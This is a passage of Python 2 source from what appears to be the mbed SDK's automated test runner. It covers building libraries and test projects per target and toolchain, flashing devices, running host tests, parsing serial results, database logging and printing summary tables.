test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_extend_test_timeout=None):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
for target, toolchains in self.test_spec['targets'].iteritems():
test_suite_properties_ext[target] = {}
for toolchain in toolchains:
# Test suite properties returned to external tools like CI
test_suite_properties = {}
test_suite_properties['jobs'] = self.opts_jobs
test_suite_properties['clean'] = clean
test_suite_properties['target'] = target
test_suite_properties['test_ids'] = ', '.join(test_ids)
test_suite_properties['toolchain'] = toolchain
test_suite_properties['shuffle_random_seed'] = self.shuffle_random_seed
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
T = TARGET_MAP[target]
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
test_suite_properties['skipped'].append(test_id)
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
test_suite_properties['skipped'].append(test_id)
continue
if test.automated and test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
test_suite_properties['skipped'].append(test_id)
continue
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
libraries = []
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies:
libraries.append(lib['id'])
# Build libs for test
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs)
except ToolException:
project_name_str = project_name if project_name is not None else test_id
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
single_test_result, detailed_test_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
# Append test results to global test summary
if single_test_result is not None:
test_summary.append(single_test_result)
# Prepare extended test results data structure (it can be used to generate detailed test report)
if toolchain not in test_summary_ext:
test_summary_ext[toolchain] = {} # test_summary_ext : toolchain
if target not in test_summary_ext[toolchain]:
test_summary_ext[toolchain][target] = {} # test_summary_ext : toolchain : target
if target not in test_summary_ext[toolchain][target]:
test_summary_ext[toolchain][target][test_id] = detailed_test_results # test_summary_ext : toolchain : target : test_it
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
test_suite_properties_ext[target][toolchain] = test_suite_properties
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target. Test is being invoked afterwards.
"""
data = json.loads(test_spec)
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
break
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
image_dest = mut.get('image_dest') # Image file destination DISK + IMAGE_DEST + BINARY_NAME
images_config = mut.get('images_config') # Available images selection via config file
mobo_config = mut.get('mobo_config') # Available board configuration selection e.g. core selection etc.
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s())
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'single_test_result' : single_test_result,
'single_test_output' : single_test_output,
'target_name' : target_name,
'toolchain_name' : toolchain_name,
'test_id' : test_id,
'test_description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result),
target_name,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JOSN structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
